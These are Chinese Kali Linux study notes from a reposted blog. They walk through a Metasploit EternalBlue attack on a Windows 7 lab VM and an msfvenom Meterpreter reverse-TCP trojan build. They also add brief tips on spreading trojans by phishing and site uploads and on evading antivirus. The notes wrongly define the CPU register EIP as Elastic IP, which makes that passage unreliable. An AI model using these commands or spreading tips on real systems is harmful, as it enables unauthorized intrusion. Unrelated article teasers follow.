kali学习

目录

黑客法则:

一:页面使用基础

二:msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

使用永恒之蓝进行攻击

​编辑 使用kali渗透工具生成远程控制木马

渗透测试——信息收集

域名信息收集


黑客法则:

一:页面使用基础

1.kali十三大使用工具

2.打开终端

3.设置

二:msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

定义:

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。 shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

eip定义:

弹性公网IP (Elastic IP,简称EIP)提供独立的公网IP资源,包括公网IP地址与公网出口带宽服务。为资源配置弹性公网IP后,可以直接访问Internet,如果资源只配置了私网IP就无法直接访Internet。
快捷键:

ctrl加shift加+;ctrl加- 调整字符大小

使用永恒之蓝进行攻击

命令行调整用户:

sudo su
sudo 用户名 

打开msf: 

msfconsole

msfconsole:console(管理口) 

msf搜索模块:

search  ms17_010

 使用模块:

use 0
use exploit/windows/smb/ms17_010_eternalblue

查看当前模块的设置 

show options
options

测试win7和kali虚拟机的连通性

kali虚拟机IP地址

ip a

win7虚拟机IP地址

ipconfig

 可以相互ping通

kali ping win7

win7 ping kali

设置IP地址为目标

set RHOSTS 172.16.100.220

源监听地址 

tcp的逻辑端口:LPORT(0-65535)只要不被占用,可以随意修改 

 运行程序

 使用kali渗透工具生成远程控制木马

帮助命令

help

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.100.129 lport=60000 -f exe -o demo60000.exe

background

真实情况下,木马如何传播呢? 

一:采用网站的漏洞,进行二次上传

二:通过伪装、免杀、绑定进行钓鱼

免杀 

加壳:themida

渗透测试——信息收集

定义:

信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集但不限于资产收集。
意义:

●信息收集是渗透测试成功的保障
●更多的暴露面
●更大的可能性

分类:

●主动信息收集
通过直接访问网站在网站上进行操作、对网站进行扫描等,这种是有网络流量经过目标服务器的信息收集方式。
●被动信息收集
基于公开的渠道,比如搜索引擎等,在不与目标系统直接交互的情况下获取信息,并且尽量避免留下痕迹。
内容:

●服务器信息(端口、服务、真实IP)
●网站信息(网站架构(操作系统、中间件、数据库、编程语言)、指纹信息、WAF、敏感目录、敏感文件、源码泄露、旁站查询、C段查询)
●域名信息(whois、 备案信息、子域名)
●人员信息(姓名、职务、生日、联系电话、邮件地址)
 

域名信息收集

域名(Domain Name),简称域名、网域,是由- -串用点分隔的名字组成的Internet.上某一 台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)
DNS (域名系统,Domain Name System)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。
 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/236822.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

R语言30分钟上手

文章目录 1. 环境&安装1.1. rstudio保存工作空间 2. 创建数据集2.1. 数据集概念2.2. 向量、矩阵2.3. 数据框2.3.1. 创建数据框2.3.2. 创建新变量2.3.3. 变量的重编码2.3.4. 列重命名2.3.5. 缺失值2.3.6. 日期值2.3.7. 数据框排序2.3.8. 数据框合并(合并沪深300和中证500收盘…

理解Gamma传递函数

对于任何认真从事色彩工作或电影和电视母带处理的人来说,掌握Gamma编码是一项重要的知识,但它也可能是最令人困惑的主题之一,因为我们人类的视力与大多数电子设备的工作方式截然不同。 Gamma编码和传递函数的全部工作都是基于向我们的人眼提供…

(二)Tiki-taka算法(TTA)求解无人机三维路径规划研究(MATLAB)

一、无人机模型简介: 单个无人机三维路径规划问题及其建模_IT猿手的博客-CSDN博客 参考文献: [1]胡观凯,钟建华,李永正,黎万洪.基于IPSO-GA算法的无人机三维路径规划[J].现代电子技术,2023,46(07):115-120 二、Tiki-taka算法(TTA&#xf…

爬虫从入门到精通(21) |字体加密通杀方案

文章目录 一、了解什么是字体加密二、Python打开字体加密文件三、字体加密的通杀1.静态的字体文件固定顺序的字体2.其他动态变化情况 一、了解什么是字体加密 字体加密是页面和前端字体文件想配合完成的一个反爬策略。通过css对其中一些重要数据进行加密,使我们在代…

什么是企业资金

我从两个方面来诠释企业资金管理: 1、企业资金管理是什么? 2、企业资金管理包括什么? 一、企业资金管理是什么? 众所周知,每个企业都有对应的财务部门,专门负责管理企业的“钱”,和企业的“帐…

【赠书第10期】从概念到现实:ChatGPT和Midjourney的设计之旅

文章目录 前言 1 ChatGPT的崛起 2 Midjourney的探索 3 技术创新的交汇 4 对未来的影响 5 结论 6 推荐图书 7 粉丝福利 前言 在过去的几年里,自然语言处理和聊天模型的领域取得了飞速的发展。ChatGPT 作为一个由OpenAI 开发的大型语言模型,以其强…

AI 文本转视频(视频生产工具分享)

AI 文本转视频(视频生产工具分享) 介绍 ​ 想要根据任何描述轻松创建有趣的视频吗?然后,您应该尝试使用人工智能视频生成工具。毫无疑问,人工智能是未来。人工智能视频生成器可以轻松地从任何文本制作视频。只需几分…

中国毫米波雷达产业分析5——毫米波雷达应用案例介绍

一、上海某区康养标杆工程 项目甲方:上海某康养中心 项目地点:上海徐汇区 项目时间:2023年8月 供应商:南京苗米科技有限公司 (一)项目需求 该康养社区集中收治了区内75岁以上老龄化人群和部分阿尔茨海默…

03-IDEA集成Git,初始化本地库,添加远程仓库,提交,拉取,推送,分支的快捷操作

IDEA集成Git 创建Git忽略文件 不同的IDE开发工具有不同的特点文件,这些文件与项目的实际功能无关且不参与服务器上的部署运行, 把它们忽略掉能够屏蔽之间的差异 局部忽略配置文件: 在本地仓库的根目录即项目根目录下直接创建.gitignore文件, 以文件后缀或目录名的方式忽略指定…

Spring-SpringFramework特性以及IOC相关知识

SpringFramework五大模块 特性 IOC思想和DI IOC是容器,用于管理资源 IOC:Inversion of Control 反转控制 DI:Dependecy Injection 依赖注入 组件以预先定义好的方式接受来自容器的资源注入 IOC在Spring中的实现 spring提供两种方式&…

算法与数据结构有区别吗?

算法和数据结构并不是同一件事。严格来说,它们并不是等效的。但是,我们通常在使用的时候会互换这两个术语。为了简便,后文我们会用数据结构这个术语来指代“数据结构及其所有相关的方法”。 有很多方法可以用来说明这两个术语之间的区别&…

【数据结构】循环链表和双向链表

【循环链表】 (有头结点) pR1->next; R1->nextR2->next->next; free(R2->next); R2->nextp; 例&#xff1a;对于两个单循环链表a&#xff0c;b&#xff0c;将其连接起来&#xff0c;变成一个单循环链表 #include<stdio.h> #include<stdlib.h> …